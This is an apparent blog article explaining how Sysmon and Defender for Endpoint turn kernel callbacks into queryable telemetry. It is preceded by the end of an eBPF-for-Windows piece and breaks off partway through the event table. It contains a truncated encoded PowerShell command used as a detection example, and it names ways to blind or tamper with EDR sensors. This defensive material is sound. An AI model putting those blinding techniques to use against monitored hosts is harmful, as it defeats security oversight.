eBPF-for-Windows is the convergence experiment. The native mode -- PREVAIL plus bpf2c plus MSVC plus a signed .sys driver -- is the first cross-OS-portable kernel-observability primitive. As of 2026 it covers a networking subset of hooks, not the full Linux surface. That gap is not architectural; it is a list of hooks Microsoft has not yet exposed. The pattern is generalizable: cross-OS observability lives in the verifier, not in the runtime, and each OS lifts verified bytecode into its own trust model.

The generation gap is literal. ETW (2000) is an event bus. eBPF (2014) is a programmable kernel substrate. Both will still ship in 2035. Both will still be the right answer for some workloads. The interesting work for the next decade is in the convergence layer -- helper-API standardization, hook-point taxonomy alignment, verifier completeness -- and in the multi-tenant production engineering that makes ten different agents on one kernel cheaper than ten times one agent.

Key idea: Kernel observability has matured from event emission to programmable kernel computation. That generation gap is why eBPF-for-Windows -- a small, work-in-progress project -- is one of the more architecturally significant operating-system-telemetry events of the last decade. The portable abstraction is not the runtime. It is the static analyzer.

No. As of 2026, eBPF for Windows [@github-com-for-windows] covers a networking-heavy subset of hooks -- XDP, BIND, SOCK_OPS, SOCK_ADDR, and process creation and exit -- and is not yet a substitute for Defender-grade kernel telemetry. ETW remains the canonical Windows observability substrate. The convergence between the two is real for the networking subset, and is the work-in-progress for the rest of the surface. Because it is a heuristic abstract interpreter on a Turing-complete ISA, and Rice's theorem says no such verifier can be simultaneously sound, complete, and decidable. Real verifiers ship with all three approximately, and the soundness leg fails first when state pruning loses information at a join point. CVE-2023-2163 [@nvd-nist-gov-2023-2163], CVE-2022-23222 [@nvd-nist-gov-2022-23222], CVE-2021-3490 [@nvd-nist-gov-2021-3490], and CVE-2020-8835 [@nvd-nist-gov-2020-8835] are all instances of that pattern. For the networking subset (XDP, SOCK_ADDR, SOCK_OPS, BIND), yes -- eBPF for Windows [@github-com-for-windows] is source-compatible with Linux eBPF for those hooks. For arbitrary kprobes or LSM hooks, no -- those hooks are Linux-internal and eBPF for Windows does not expose equivalents. Cross-platform agents typically ship two binaries that share a build system. Since Linux 5.16 (March 2022) [@kernel-org-bpf-indexhtml], `kernel.unprivileged_bpf_disabled=1` is the kernel default. Production EDRs run with `CAP_BPF` plus `CAP_PERFMON` or root. Leaving unprivileged eBPF enabled was the entry point for several verifier CVEs, so the conservative default is correct. A kprobe is a runtime breakpoint mechanism: the kernel patches a trap instruction at the target address, and the trap handler invokes the attached eBPF program. fentry uses the BPF trampoline [@lore-kernel-org-1-astkernelorg] -- a small JIT-emitted dispatcher that calls attached BPF programs with a direct call, avoiding the retpoline penalty an indirect dispatch would pay on Spectre-mitigated kernels. Starovoitov's framing: *"practically zero overhead"* for fentry, relative to the kprobe trap-frame cost. No. ETW sessions filter by provider, keyword, and level. That is it. Any per-event computation -- counting, sampling, stack-trace folding, downsampling -- runs in user mode on the consumer side, after the event has crossed the kernel-user boundary. The lack of an in-kernel filter language is the structural reason eBPF can do things ETW cannot, like aggregate ten million `vfs_read` calls per second into a histogram without saturating the wire. Sysmon for Linux [@github-com-microsoft-sysmonforlinux] replaces the ETW back end with eBPF kprobes via Microsoft's `SysinternalsEBPF` library. The XML configuration schema, Event IDs, and Operational channel output are preserved, so a SIEM consumer sees identical telemetry from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.

From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work

noreply@paragmali.com (Parag Mali) — Wed, 13 May 2026 00:00:00 GMT

Modern Windows EDR is a seven-layer production pipeline. A kernel callback fires, a user-mode aggregator labels the event, an ETW publisher (Sysmon) or a TLS-pinned cloud forwarder (`SenseCncProxy.exe`) ships it, and within seconds the event surfaces as a row in a Kusto table that the analyst queries with KQL. Sysmon (Russinovich and Garnier, August 2014) is the configurable kernel-callback-then-publish reference: twenty-nine event IDs, three canonical configurations (SwiftOnSecurity, the post-rename `NextronSystems/sysmon-config`, and `olafhartong/sysmon-modular`), Antimalware-PPL hardening since v15 in June 2023. Microsoft Defender for Endpoint (Windows Defender ATP preview March 2016, MDE rename September 2020, Microsoft Defender XDR portal late 2023) is the commercial cloud-correlated counterpart: `MsSense.exe` runs as Antimalware-PPL, shares the `WdFilter.sys` / `WdBoot.sys` / `WdNisDrv.sys` Defender Antivirus kernel surface, and lands events in six `Device*` Advanced Hunting tables with 30-day in-portal retention, extended via the Microsoft Sentinel Defender XDR connector. For MDE-licensed shops with a detection-engineering team, the community pattern is Hartong's `sysmonconfig-mde-augment.xml` -- Sysmon as a complement, not a duplicate. The pipeline's four structural ceilings (pre-driver-load horizon, observation-vs-enforcement latency, MDE schema truncation, kernel-mode adversary primitive) are documented and unclosed; FalconForce's 2022 CVE-2022-23278 disclosure and InfoGuard Labs' 2025 certificate-pinning bypass bookend an adversarial arc the field has not yet ended.

1. From `cmd.exe` to a Kusto Row in Ninety Seconds

At 9:14 a.m. on a Monday, a SOC analyst named Maya watches a DeviceProcessEvents row light up in the Advanced Hunting console of Microsoft Defender XDR. The FileName is powershell.exe. The ProcessCommandLine reads powershell.exe -enc JABzAD0A.... The InitiatingProcessFileName is WINWORD.EXE. The Timestamp is three seconds ago [@deviceprocessevents-table].

By 9:15:44 Maya has pivoted to DeviceNetworkEvents, found an outbound connection from the same InitiatingProcessId to a previously-unknown IP on TCP/443, clicked Isolate device in the device page, and the endpoint is off the network. Ninety seconds, end to end. Email triage of the original message; a quarantine on the inbound .docm; and -- by the time the user's coffee has cooled -- a brand-new IOC in the tenant's custom indicator list.

This article is the rewind. We walk Maya's ninety seconds backwards through the seven pipeline layers that made the triage possible -- starting in ring zero, ending in the KQL query you can copy into your own tenant -- and along the way we answer the question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?

The seven layers

Maya is looking at a single Kusto row. Behind that row sit seven distinct software components, each of which can fail independently:

A kernel callback fired inside the nt!PspInsertProcess path on the target machine the instant WINWORD.EXE called CreateProcessW to spawn powershell.exe. The callback handler lives inside WdFilter.sys (Defender Antivirus's filter driver) and inside SysmonDrv.sys if Sysmon is also installed [@pssetcreateex-msdn].
A user-mode aggregator -- MsSense.exe for Defender for Endpoint, or Sysmon.exe (the service) for Sysmon -- received the structured callback notification, enriched it with parent-process state, file hashes, signature information, and identity data, and decided whether the event was worth shipping [@mde-ms-learn][@sysmon-ms-learn].
An ETW publisher -- in Sysmon's case the Microsoft-Windows-Sysmon provider -- emitted the event to the operating system's tracing bus, and the Sysmon service wrote it to the Microsoft/Windows/Sysmon/Operational event log [@sysmon-ms-learn].
A cloud forwarder -- SenseCncProxy.exe -- ran the Defender payload through TLS with certificate pinning out to the regional Defender XDR ingest endpoint [@falconforce-2022].
A cloud sensor pipeline in Microsoft's regional datacenter (the US for US tenants, the EU for European tenants, the UK for UK tenants) wrote the event into the Advanced Hunting Kusto cluster [@advanced-hunting-overview][@ms-server-endpoints-learn].
A Kusto table -- DeviceProcessEvents -- became queryable within seconds, joined logically across roughly fifty columns to its siblings (DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceImageLoadEvents, DeviceEvents) [@deviceprocessevents-table].
A KQL query Maya wrote, or one of Microsoft's built-in detection rules, joined the process row to the network row on (DeviceId, InitiatingProcessId), surfaced the C2 callback inside a ninety-second window, and put the device-isolation button on her screen [@advanced-hunting-overview][@sentinel-xdr-connector].

Each of these seven layers is independently failure-prone. Operating an EDR well -- which is what this article is about -- means knowing which layer produced which artifact, which layer can be tampered with, and which layer is the right one to fix when the row does not arrive.

Key idea: Modern Windows EDR is a seven-layer production pipeline: kernel callback, user-mode aggregator, ETW publisher (or cloud forwarder), TLS-pinned cloud transport, regional Kusto ingest, table write, KQL read. Sysmon and Microsoft Defender for Endpoint are two implementations of the same seven layers, with different design philosophies at every layer.

Why two products, not one

Sysmon and Defender for Endpoint were not designed as a pair. They evolved as competing answers to the same problem -- when prevention fails, what evidence do you give the responder? -- on the same operating system, with the same kernel-callback APIs underneath, and with the same Windows Event Tracing bus as the transport layer in the middle. They converged on a shared trust model only in 2023, when both products began running as protected processes [@sysmon-ms-learn][@falconforce-2022].

That convergence is not coincidence. It is the consequence of a decade of architectural pressure pushing both products toward the same answer: collect at the Microsoft-sanctioned kernel-callback boundary, normalize in user mode, ship over a tamper-resistant transport, and surface to the analyst as a queryable column family. The differences are in the configuration grammar, the cloud-side enrichment, and the trust boundary at the publisher edge. The seven layers are the same. To see why, we have to start in 2014, when Sysmon shipped with three event types.

2. Twelve Years, Two Arcs, One Convergence

Anton Chuvakin, then a research VP at Gartner, named the category in July 2013. His blog post -- preserved on his personal site after Gartner deleted its analyst blogs in late 2023 -- coined the term Endpoint Threat Detection and Response (ETDR) and defined it as "tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints" [@chuvakin-2013][@wikipedia-edr]. The "T" dropped out of the acronym within eighteen months and the field has been called EDR ever since.

Chuvakin's question -- what evidence do you give the responder when prevention fails? -- got two different answers from inside Microsoft over the next decade. One was free, configurable, and ran on every Windows machine the operator wanted to run it on. The other was commercial, cloud-correlated, and only worked if you paid for it. Both started in the same place: at the supported kernel-callback boundary that Microsoft had been steadily building out since Windows XP.

The Sysmon arc: August 2014 to March 2026

Mark Russinovich gave session HTA-T07R at RSA US 2014 -- Malware Hunting with the Sysinternals Tools -- and the methodology he taught (process-tree pivoting, autoruns enumeration, real-time monitoring of file and registry writes) had a natural conclusion: somebody should ship a Sysinternals tool that did all of that, continuously, into the Windows event log [@russinovich-rsa-2014]. The tool shipped in August 2014, written by Russinovich and Thomas Garnier, also of Microsoft. ZDNet's contemporaneous coverage captured the introduction: "Sysmon, written by Russinovich and Thomas Garnier, also of Microsoft, is the 73rd tool in the set... Note: For public release, Sysmon has been reset to version 1.00" [@zdnet-sysmon-2014]. The launch SKU had three event types: process create (EID 1), file-create-time change (EID 2), and network connect (EID 3).

The design philosophy is captured in a single sentence Microsoft Learn still prints on the Sysmon download page -- a sentence whose framing of Sysmon as a publisher that refuses to do detection and refuses to hide is the entire foundation of the SwiftOnSecurity-NextronSystems-Hartong configuration lineage that §5 unpacks; the verbatim quote lands as the §4 PullQuote [@sysmon-ms-learn]. Every detection-engineering corpus in the Windows field -- SwiftOnSecurity's config, Florian Roth's fork, Olaf Hartong's modular system, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of that one design choice.

The version history reads as capability accretion, not architectural change. Sysmon v6 in February 2017 added registry events (EIDs 12-14), process-access (10), file-create (11), pipe events (17-18), file-create-stream-hash (15), and the ServiceConfigurationChange (16) audit of Sysmon's own settings [@sysinternals-blog-v6]. (EID 7 ImageLoad arrived earlier, in Sysmon v2.0 -- the §4 catalogue places it correctly.) Sysmon v10 in June 2019 added DNS-query observation via ETW consumption of Microsoft-Windows-DNS-Client; the v10 release date is recorded in the community-curated Sysmon Version History repository, explicitly marked "Outdated" past v11.10 because its maintainer stopped updating it [@sysmon-version-history]. v13 added ClipboardChange and ProcessTampering. v14 in August 2022 added the first preventive event -- FileBlockExecutable (EID 27) -- making Sysmon something subtly more than a publisher [@diversenok-2022][@hartong-sysmon14-medium].

The architectural inflection landed in June 2023 with Sysmon v15, when the Sysmon service began running as a protected process. BleepingComputer's contemporaneous coverage notes that the service ran as PROTECTED_ANTIMALWARE_LIGHT and the schema bumped to 4.90 with the new FileExecutableDetected event ID 29 [@bleepingcomputer-sysmon15][@hartong-sysmon15-medium]. The Microsoft Learn page now states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. The latest published release at the time of writing is v15.2 on March 26, 2026 (per the Sysmon download page's Published by-line), with twenty-nine event types plus EID 255 (Error) [@sysmon-ms-learn].

The MDE arc: March 2016 to late 2023

Microsoft announced Windows Defender Advanced Threat Protection in a Windows Experience blog post on March 1, 2016 -- "Today, we announce the next step in our efforts to protect our enterprise customers, with a new service, Windows Defender Advanced Threat Protection" [@ms-blog-atp-mar2016]. The service was framed as a cloud-correlated detection-and-investigation layer on top of the Windows 10 sensor, "informed by anonymous information from over 1 billion Windows devices" [@ms-blog-atp-mar2016]. The 2016 product was Windows-only, in-portal, and oriented to detection and investigation only.

The Fall Creators Update in October 2017 broadened the product into prevention: "The Windows Fall Creators Update represents a new chapter in our product evolution as we offer a set of new prevention capabilities designed to stop attacks as they happen and before they have impact. This means that our service will expand beyond detection, investigation, and response, and will now allow companies to use the full power of the Windows security stack for preventative protection" [@ms-blog-atp-jun2017]. Attack Surface Reduction rules, Exploit Guard, and Application Guard joined the platform. So did the Advanced Hunting query surface in 2018 -- KQL on the same Device* tables Maya uses in §1.

The cross-platform reach arrived in March 2019 with macOS support (initially as Microsoft Defender ATP) and was extended to networked Linux and macOS discovery by February 2021 [@securityweek-defender-macos][@bleepingcomputer-defender-linux]. The product was renamed twice. The most-cited rename came at Microsoft Ignite 2020 on September 22, 2020, when the Microsoft Security blog announced the product family rebrand: "Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)" [@ms-unified-siem-xdr-2020]. The same post renamed Microsoft Threat Protection to Microsoft 365 Defender, O365 ATP to Microsoft Defender for Office 365, and Azure ATP to Microsoft Defender for Identity. The second rename was at Microsoft Ignite 2023 in November 2023, when Microsoft 365 Defender became Microsoft Defender XDR, announced as part of the broader product rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog].The Ignite 2023 rebrand did not change the KQL substrate, the Device* schema, or the Sentinel connector contract. It is a marketing relabel on top of a stable cloud surface. Detection engineering teams kept writing queries against DeviceProcessEvents exactly as they did the day before the rename.

The configuration-lineage arc

A third arc ran in parallel with the two product arcs: the community-maintained Sysmon configurations that turned Sysmon from a kernel-callback publisher into a deployment-ready detection sensor.

The historical root is SwiftOnSecurity's sysmon-config repository, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is succinct: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The repository remains the most-cited Sysmon-configuration starting point in the SOC industry.

Florian Roth, working under the handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 (the exact creation date is now obscured by a 2021 rename -- see the sidenote below). The fork added blocking-rule support for Sysmon v14, an actively-maintained set of community pull-request merges, and the export-block.xml variant that ships the v14+ FileBlockExecutable rules. The README states the lineage verbatim: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The current maintainer roster lists Florian Roth, Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali.

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository takes a different design approach: instead of one monolithic XML config, Hartong ships a per-EID-and-per-technique module library that compiles down into one of several pre-generated artifacts -- sysmonconfig.xml (default), sysmonconfig-with-filedelete.xml (default plus archive), sysmonconfig-excludes-only.xml (verbose), sysmonconfig-research.xml (super-verbose, with the warning "really DO NOT USE IN PRODUCTION!"), and the load-bearing sysmonconfig-mde-augment.xml whose entire design intent is to fill the gaps in Defender for Endpoint's collection surface [@github-hartong-modular].Olaf Hartong and Henri Hambartsumyan, the two FalconForce researchers who reverse-engineered Defender for Endpoint in 2022 and surfaced CVE-2022-23278, also maintain olafhartong/sysmon-modular. This is the dual identity that makes the sysmonconfig-mde-augment.xml config uniquely informed: the same people who learned where MDE's collection truncates Sysmon's manifest also published the config that fills those gaps [@falconforce-2022][@github-hartong-modular].

The Neo23x0 repository was renamed in 2021. The current https://github.com/Neo23x0/sysmon-config URL HTTP-301s to https://github.com/NextronSystems/sysmon-config, and the GitHub REST API returns a created_at of 2021-07-24T06:19:41Z with a parent field pointing to SwiftOnSecurity/sysmon-config [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; only the organizational owner moved from Florian Roth's personal handle to his employer Nextron Systems.

By 2023, then, two product arcs and one configuration arc had converged on the same baseline: kernel callbacks (PsSetCreateProcessNotifyRoutineEx, ObRegisterCallbacks, CmRegisterCallbackEx, Filter Manager minifilters) on the input side; an Antimalware-PPL protected service on the host; an ETW or TLS-pinned cloud transport in the middle; and KQL on Device* tables on the reader side. The convergence was structural, not coincidental. To see why both arcs landed in the same place, we have to start at the kernel-callback boundary -- where Sysmon's input lives.

3. Sysmon Architecture: Kernel Collection, ETW Emission, Event Log Persistence

If you have ever read that Sysmon is an "ETW-based event source," you have read something that is half-true. The half that is right is the output side: Sysmon publishes its events through an ETW provider called Microsoft-Windows-Sysmon, and the rest of the system -- including the Windows Event Log service -- subscribes to that provider. The half that is wrong is the input side. Sysmon does not get most of its raw observations from ETW. It gets them from five kernel-callback families and one Filter Manager minifilter, with two narrow ETW-consumer exceptions (DNS-Client for EID 22; the WMI activity provider for EIDs 19-21).

This distinction is small enough that most blog posts skip it and big enough that getting it wrong leads to architectural confusion. The split between collection (how data enters the Sysmon driver) and emission (how data leaves the Sysmon service) is the first thing to get straight before anything else makes sense.

The in-kernel, low-overhead, manifest-described tracing infrastructure built into Windows since 2000. Providers publish structured events; controllers start trace sessions and select which providers to enable; consumers receive events live or read them from `.etl` files. Sysmon uses ETW as its *output* bus -- its kernel driver hands events to the user-mode service via a private ETW session -- and as a small input source for the DNS-Client kernel provider (EID 22) and the WMI activity provider (EIDs 19-21). A Microsoft-sanctioned ring-0 API for observing operating-system events without patching the System Service Descriptor Table. The Windows kernel exposes a small set of named callback APIs -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load (with a `SystemModeImage` bit that distinguishes kernel drivers from user-mode DLLs), `PsSetCreateThreadNotifyRoutineEx` for thread creation (with a remote-thread flag), `ObRegisterCallbacks` for handle-rights filtering against `PsProcessType` and `PsThreadType`, `CmRegisterCallbackEx` for registry operations, and the Filter Manager minifilter framework for file-system I/O. A driver registers a function pointer; the kernel invokes it on the corresponding event with the structured context. PatchGuard tolerates kernel callbacks; it does not tolerate SSDT patching [@wikipedia-kpp][@pssetcreateex-msdn][@ms-wdk-kernel-callbacks]. The file-system filter-driver framework (`FltMgr.sys`) that hosts minifilter drivers between the I/O manager and the file-system stack. Each minifilter declares an *altitude* (a 16-bit priority) and receives notifications for pre- and post-operation hooks on file create, file write, set-information, and set-security. Both `SysmonDrv.sys` and `WdFilter.sys` are minifilters; they coexist at different altitudes without colliding [@sysmon-ms-learn].

Five collection mechanisms, one ETW publisher

The Microsoft Learn page for Sysmon enumerates the event IDs and describes them at the what level; the how (which kernel API actually produced each event) is documented partly in the API references for each callback API and partly in the source code of Sysmon's open Linux port, microsoft/SysmonForLinux, which reuses Sysinternals' shared C++ rule-engine for parsing the same XML schema and translating it onto eBPF instead of kernel callbacks [@github-sysmon-linux][@sysmon-ms-learn]. The Windows port is closed source, but Sysinternals' design has been documented enough -- across the RSA 2014 talk, the Diversenok 2022 reverse-engineering writeup, and the SysmonForLinux source -- that the collection-mechanism inventory is unambiguous.

The five mechanisms are:

Mechanism	API or framework	Sysmon EIDs produced
Process-lifetime callback	`PsSetCreateProcessNotifyRoutineEx`	1 (ProcessCreate), 5 (ProcessTerminate)
Image-load callback	`PsSetLoadImageNotifyRoutine`	7 (ImageLoad); 6 (DriverLoad, distinguished by the `IMAGE_INFO.SystemModeImage` flag on the kernel-mode image)
Thread-creation callback	`PsSetCreateThreadNotifyRoutineEx` (with the `PS_CREATE_THREAD_NOTIFY_FLAG_CREATE_REMOTE` flag in `CREATE_THREAD_NOTIFY_INFO`)	8 (CreateRemoteThread)
Object Manager callback	`ObRegisterCallbacks` against `PsProcessType`	10 (ProcessAccess)
Registry callback	`CmRegisterCallbackEx`	12 (Registry Object Create/Delete), 13 (Registry Value Set), 14 (Registry Key/Value Rename)
Filter Manager minifilter	`FltRegisterFilter` against `FltCreate`/`FltClose`/`FltSetInformation` -- ordinary file system, and the Named Pipe File System (NPFS, `\Device\NamedPipe`) at a different altitude	11 (FileCreate), 15 (FileCreateStreamHash), 17 (PipeEvent Created), 18 (PipeEvent Connected), 23 (FileDelete archived), 26 (FileDeleteDetected), 27 (FileBlockExecutable), 28 (FileBlockShredding), 29 (FileExecutableDetected)

The five-mechanism framing collapses thread-creation and Object Manager callbacks into one architectural family ("process and thread observation via Microsoft-sanctioned callbacks"); a stricter count is six (process-lifetime, image-load, thread-creation, object-handle, registry, minifilter). Either count is defensible; what matters is keeping the API attribution honest: PsSetCreateThreadNotifyRoutineEx is the canonical remote-thread observer, ObRegisterCallbacks(PsProcessType) is the canonical handle-rights filter, and NPFS minifiltering -- not ObRegisterCallbacks -- is what observes named-pipe creation and connection.

The sixth source -- the ETW consumer path -- is special. For DNS queries (EID 22), Sysmon does not register a kernel callback. It subscribes as a consumer of the Microsoft-published Microsoft-Windows-DNS-Client ETW provider, parses the structured DNS events, and republishes them through its own ETW provider with the Sysmon enrichments applied [@sysmon-version-history]. DNS-Client is the only event Sysmon consumes from a Microsoft-published kernel ETW provider; the WmiEvent family (EIDs 19-21) is implemented in a similar consumer style against the WMI activity provider's user-mode tracing surface, which is why the §4 catalogue marks those rows as "WMI ETW provider consumer." Either way, ETW consumption is the input-side exception, not the rule: five kernel-callback families do the bulk of the work, and ETW is the input only for a small, deliberately-chosen set of events.The Sysmon ETW provider has the GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}. Microsoft Learn does not enumerate this GUID on the Sysmon page; the authoritative on-host discovery command is logman query providers Microsoft-Windows-Sysmon, which returns the GUID, the keywords mask, and the registered processes. Pavel Yosifovich's community ETW-provider catalogue EtwExplorer mirrors the value [@etwexplorer-sysmon-guid], with the on-host logman command remaining the authority of last resort.

The ProcessCreate path, step by step

The clearest way to see how the pieces fit is to trace one event. Sysmon's process-create handling is the most-quoted EID in the manifest -- it is the EID that produces Maya's row in §1 -- and it follows the canonical kernel-callback pattern that Microsoft codified in PsSetCreateProcessNotifyRoutineEx:

// Conceptual pseudocode for SysmonDrv's process-create path.
// Real Sysmon source for Windows is closed; the Linux port is open.
// This is the contract documented in the WDK reference for
// PsSetCreateProcessNotifyRoutineEx.

NTSTATUS SysmonDrvEntry(PDRIVER_OBJECT DriverObject, ...) {
    // 1. Register the create-process callback. PatchGuard tolerates this.
    PsSetCreateProcessNotifyRoutineEx(SysmonProcessCreateCb, FALSE);
    // ... other callbacks registered similarly ...
    return STATUS_SUCCESS;
}

VOID SysmonProcessCreateCb(
    HANDLE  ParentId,
    HANDLE  ProcessId,
    PPS_CREATE_NOTIFY_INFO  CreateInfo  // NULL on process exit
) {
    if (CreateInfo == NULL) {
        // Process exit: emit EID 5 (ProcessTerminate).
        SysmonEmitEventEID5(ProcessId);
        return;
    }
    // Process create. Apply the XML rule engine: does this process
    // match any <Include> rule, after evaluating <Exclude> overrides?
    if (!SysmonRuleMatch(EID_1, CreateInfo)) {
        return;  // Filtered: produce no event.
    }
    // Enrich with parent process, command line, image hash, integrity
    // level, user SID, ProcessGuid, and session identifiers, then ship
    // through the private Microsoft-Windows-Sysmon ETW publisher.
    SysmonEmitEventEID1(CreateInfo);
}

Four properties of the path matter. First, the callback is invoked synchronously on the thread that issued the CreateProcessW call, before the new process's first instruction runs; the parent and child PIDs are both known, but the new process has not yet executed any user-mode code. Second, the callback is rate-limited only by your rule engine -- there is no built-in throttle, and a verbose <Include> rule on a high-process-turnover host can saturate the ETW session. Third, the callback runs at IRQL = PASSIVE_LEVEL, so it can do file I/O (which the driver needs for hashing) but it must do that I/O carefully to avoid deadlock on the very file system it is monitoring. Fourth, the Sysmon service runs as a separate user-mode process; if the service has crashed or been suspended, the driver continues to emit ETW events into a session with no listener and they evaporate.

Sysmon's per-process unique identifier, formatted as a 128-bit GUID and recorded as the `ProcessGuid` field on every event that names a process. Unlike a Windows process ID, the ProcessGuid survives PID reuse and uniquely identifies a process across its lifetime [@sysmon-ms-learn]; SOC tooling commonly joins on `(DeviceId, ProcessGuid)` to reconstruct process trees and avoid the PID-reuse race condition that plagues raw `ProcessId` joins.

Where the events go

Once the user-mode Sysmon.exe service has labelled the event, it does two things. First, it writes the event to the Windows event log -- specifically to Applications and Services Logs/Microsoft/Windows/Sysmon/Operational per Microsoft Learn's verbatim statement: "On Vista and higher, events are stored in Applications and Services Logs/Microsoft/Windows/Sysmon/Operational" [@sysmon-ms-learn]. Second, the same event is also visible to any ETW real-time consumer subscribed to Microsoft-Windows-Sysmon -- which is how downstream collectors (Windows Event Forwarding, Splunk's universal forwarder, the Elastic Endpoint integration, Wazuh's Windows agent) actually pick the events up, rather than tailing the event log XML.

flowchart LR K1["PsSetCreateProcessNotifyRoutineEx"] --> D[SysmonDrv.sys] K2["PsSetLoadImageNotifyRoutine"] --> D K3["PsSetCreateThreadNotifyRoutineEx"] --> D K4["ObRegisterCallbacks (PsProcessType)"] --> D K5["CmRegisterCallbackEx"] --> D K6["FltRegisterFilter (file system + NPFS)"] --> D K7["ETW consumer: DNS-Client + WMI activity"] --> D D --> P["ETW publisher: Microsoft-Windows-Sysmon"] P --> S[Sysmon.exe service] S --> L["Applications and Services Logs / Microsoft / Windows / Sysmon / Operational"] P --> R["Real-time ETW consumers (WEF, Splunk UF, Wazuh, Elastic)"]

This is the first aha moment. Sysmon is not "ETW based" in the way most blog posts imply. Sysmon is a kernel driver that uses ETW as its IPC bus to user mode, and as a special-case consumer for one provider (DNS-Client). The reason Sysmon needed a kernel driver in the first place is that ETW alone could not see what the kernel callbacks see: ETW could not, in 2014, deliver a synchronous parent-PID-and-image-hash structure at process create time. Sysmon's driver does that work; ETW transports the result.

The protected-process gate added in v15 (June 2023) closed the most-trivial blinding attack -- a SYSTEM-privilege process can no longer issue OpenProcess(PROCESS_TERMINATE) against the Sysmon service to silence it. Raising the bar to a kernel-mode primitive does not eliminate the attack class, but it does change the cost model. The protected-process gate is the architectural inflection that distinguishes pre-v15 Sysmon (trivially blindable) from post-v15 Sysmon (requires a kernel primitive or a BYOVD chain) [@sysmon-ms-learn][@bleepingcomputer-sysmon15].

Five collection mechanisms, one ETW publisher, one event log. That is the input side. Now the catalogue.

4. The Sysmon Event Catalogue: Twenty-Nine IDs and Their Version Gating

Run sysmon -s on any v15.2 host and you get an XML schema enumerating twenty-nine event types plus EID 255 (Error). Every detection-engineering corpus in the field -- SwiftOnSecurity's config, Florian Roth's fork, Hartong's modular, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of this single schema [@sysmon-ms-learn][@github-sigma][@github-otrf-thp]. Learn the catalogue once and the rest of the Sysmon toolchain unfolds from it.

A naming disambiguation is worth doing first, because the colloquial event names the field uses (and that the topic input for this article uses verbatim) differ from the canonical Microsoft Learn names. "RegistrySet" is a colloquial pun on RegistryEvent (Value Set), EID 13. "DnsQuery" is a colloquial shorthand for DNSEvent (DNS query), EID 22. "NamedPipeConnect" is two events at once: PipeEvent (Pipe Created), EID 17, and PipeEvent (Pipe Connected), EID 18. The article uses the canonical Microsoft Learn names from here on.

Note: Sysmon's manifest names some events as a family with a parenthetical operation: RegistryEvent (Object create and delete) (EID 12), RegistryEvent (Value Set) (EID 13), RegistryEvent (Key and Value Rename) (EID 14). The same pattern applies to the pipe events: PipeEvent (Pipe Created) (EID 17) and PipeEvent (Pipe Connected) (EID 18). When detection-rule tooling references "EID 12-14" or "EID 17-18", these families are what it means. The colloquial single-name forms used elsewhere in the literature are not wrong; they are just less precise. The MDE schema does not preserve the parenthetical operation suffix; it surfaces these as ActionType values inside DeviceRegistryEvents.

The twenty-nine plus one catalogue

The catalogue groups naturally by the collection mechanism that produces each event:

EID	Canonical name	Collection mechanism	Introduced	Maps to (MDE)
1	ProcessCreate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessCreated`)
2	FileCreateTime	Filter Manager	v1.0 (Aug 2014)	`DeviceFileEvents` (`FileCreated`, partial)
3	NetworkConnect	Internal network-callout	v1.0 (Aug 2014)	`DeviceNetworkEvents` (`ConnectionSuccess`)
4	ServiceStateChange	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)
5	ProcessTerminate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessTerminated`)
6	DriverLoad	`PsSetLoadImageNotifyRoutine` (kernel-mode case via `IMAGE_INFO.SystemModeImage`)	v2.0 (2015)	`DeviceEvents` (`DriverLoad`)
7	ImageLoad	`PsSetLoadImageNotifyRoutine`	v2.0 (2015)	`DeviceImageLoadEvents`
8	CreateRemoteThread	`PsSetCreateThreadNotifyRoutineEx` (with `CREATE_REMOTE` flag)	v3.0 (2016)	`DeviceEvents` (truncated)
9	RawAccessRead	`\Device\Harddisk*` write filter	v3.0 (2016)	(Sysmon-only)
10	ProcessAccess	`ObRegisterCallbacks` (PsProcessType)	v6.0 (Feb 2017)	`DeviceEvents` (GrantedAccess truncated)
11	FileCreate	Filter Manager	v6.0 (Feb 2017)	`DeviceFileEvents`
12	RegistryEvent (Object create/delete)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
13	RegistryEvent (Value Set)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
14	RegistryEvent (Key/Value Rename)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
15	FileCreateStreamHash	Filter Manager	v6.0 (Feb 2017)	(Sysmon-only)
16	ServiceConfigurationChange	Sysmon-internal	v6.0 (Feb 2017)	(Sysmon-only)
17	PipeEvent (Pipe Created)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
18	PipeEvent (Pipe Connected)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
19	WmiEvent (filter)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
